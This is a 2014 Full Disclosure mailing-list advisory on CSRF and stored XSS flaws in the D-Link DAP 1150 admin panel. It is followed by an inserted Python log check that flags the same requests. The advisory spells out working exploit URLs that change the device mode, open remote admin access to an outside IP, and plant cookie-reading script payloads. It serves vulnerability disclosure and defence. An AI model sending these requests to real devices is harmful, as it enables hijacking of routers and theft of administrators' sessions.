
List:       full-disclosure
Subject:    [FD] Multiple CSRF and XSS vulnerabilities in D-Link DAP 1150
From:       "MustLive" <mustlive () websecurity ! com ! ua>
Date:       2014-04-28 20:29:24
Message-ID: 007001cf6320$9d015fd0$9b7a6fd5 () pc

Hello list!

In 2011 and at the beginning of 2012 I wrote about multiple vulnerabilities 
(http://securityvulns.ru/docs27440.html, 
http://securityvulns.ru/docs27677.html, 
http://securityvulns.ru/docs27676.html) in D-Link DAP 1150 (several dozen). 
At that time I wrote about vulnerabilities in the admin panel in Access Point mode, 
and now I'll write about holes in Router mode.

I present new vulnerabilities in this device. There are Cross-Site Request 
Forgery and Cross-Site Scripting vulnerabilities in D-Link DAP 1150 (Wi-Fi 
Access Point and Router).

SecurityVulns ID: 12076.

-------------------------
Affected products:
-------------------------

The following model is vulnerable: D-Link DAP 1150, Firmware version 1.2.94. This 
model with other firmware versions must also be vulnerable. D-Link ignored 
all vulnerabilities in this device (as in other devices which I informed 
them about) and still hasn't fixed them.

----------
Details:
----------

I remind you that in the first report about vulnerabilities in D-Link DAP 
1150 (http://securityvulns.ru/docs27440.html), I wrote about CSRF in the login 
form and other vulnerabilities, which allow one to remotely log into the admin panel 
in order to conduct CSRF and XSS attacks inside the admin panel.

CSRF (WASC-09):

In the section Advanced / Device, via CSRF it's possible to change the device mode. 
If access point mode is on, then to attack the vulnerabilities in router 
mode it's necessary to turn on that mode.

Turn on access point mode:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=112&res_struct_size=0&res_buf={%22device_mode%22:%22ap%22}&res_pos=0


Turn on router mode:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=112&res_struct_size=0&res_buf={%22device_mode%22:%22router%22}&res_pos=0


CSRF (WASC-09):

In the section Advanced / Remote access, via CSRF it's possible to add, edit and 
delete remote-access settings for the web interface. The following request will 
allow remote access to the admin panel from IP 50.50.50.50.

Add:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%2250.50.50.50%22,%20%22source_mask%22:%22255.255.255.0%22,%20%22sport%22:80,%20%22dport%22:%2280%22}&res_pos=-1


Edit:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%2250.50.50.50%22,%20%22source_mask%22:%22255.255.255.0%22,%20%22sport%22:80,%20%22dport%22:%2280%22}&res_pos=0


Delete:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=2&res_config_id=16&res_struct_size=0&res_pos=0


XSS (WASC-08):

These are persistent XSS vulnerabilities. The code will execute in the section Advanced / Remote 
access.

Attack via the add function, in parameter res_buf (in the fields IP address and Mask):

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22source_mask%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22sport%22:80,%20%22dport%22:%2280%22}&res_pos=-1


Attack via the edit function, in parameter res_buf (in the fields IP address and Mask):

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22source_mask%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22sport%22:80,%20%22dport%22:%2280%22}&res_pos=0


I mentioned these vulnerabilities at my site 
(http://websecurity.com.ua/7137/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 
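As an added example (not the advisory's own material, nor D-Link's), here is a small Python log check from the defender's side: it parses index.cgi GET requests out of constructed access-log lines, flags write actions (res_config_action 2/3) against the remote-access table (res_config_id 16) that the requests above show is reachable by a forged GET, and flags non-address values in the ips/source_mask fields carried in res_buf. The meanings of the config id and action codes are assumptions inferred from the requests in this post; the log lines are constructed.

```python
import ipaddress
import json
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (not from the advisory): a read, a remote-access
# rule added with a plain IP, and the same request carrying HTML in "ips".
SAMPLE_LOG = """\
192.168.0.2 - - [28/Apr/2014:20:29:24 +0000] "GET /index.cgi?v2=y&rq=y&res_json=y&res_config_id=16 HTTP/1.1" 200 312
192.168.0.2 - - [28/Apr/2014:20:29:31 +0000] "GET /index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%2250.50.50.50%22,%20%22source_mask%22:%22255.255.255.0%22,%20%22sport%22:80,%20%22dport%22:%2280%22}&res_pos=-1 HTTP/1.1" 200 44
192.168.0.2 - - [28/Apr/2014:20:29:40 +0000] "GET /index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%22%3Cscript%3Ealert(1)%3C/script%3E%22,%20%22source_mask%22:%22255.255.255.0%22,%20%22sport%22:80,%20%22dport%22:%2280%22}&res_pos=-1 HTTP/1.1" 200 44
"""
# Assumed from the advisory's requests: res_config_id 16 is the remote-access
# rule table; res_config_action 3 adds/edits a row and 2 deletes one.
REMOTE_ACCESS_TABLE = "16"
WRITE_ACTIONS = {"2": "delete", "3": "add/edit"}

def analyze_request(target):
    """Return findings for one request target ("/path?query"); [] if benign."""
    parts = urlsplit(target)
    if parts.path != "/index.cgi":
        return []
    q = {k: v[0] for k, v in parse_qs(parts.query).items()}  # percent-decoded
    findings = []
    action = WRITE_ACTIONS.get(q.get("res_config_action", ""))
    if action and q.get("res_config_id") == REMOTE_ACCESS_TABLE:
        findings.append(f"remote-access rule {action} via GET")
    if "res_buf" in q:
        try:
            fields = json.loads(q["res_buf"])
        except ValueError:
            return findings + ["unparsable res_buf"]
        # Markup in the IP/mask fields is stored and later rendered (the XSS).
        for name in ("ips", "source_mask"):
            if name in fields:
                try:
                    ipaddress.ip_address(str(fields[name]))
                except ValueError:
                    findings.append(f"non-IP value in {name!r}: {fields[name]!r}")
    return findings

def scan_log(text):
    """Return (target, findings) for each suspicious request line in a log."""
    results = []
    for line in text.splitlines():
        request_line = line.split('"')[1]  # e.g. GET /index.cgi?... HTTP/1.1
        target = request_line.split(" ")[1]
        findings = analyze_request(target)
        if findings:
            results.append((target, findings))
    return results
```

The same check accepts the full URLs quoted in this post, since urlsplit extracts the path and query from an absolute URL as well.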



_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

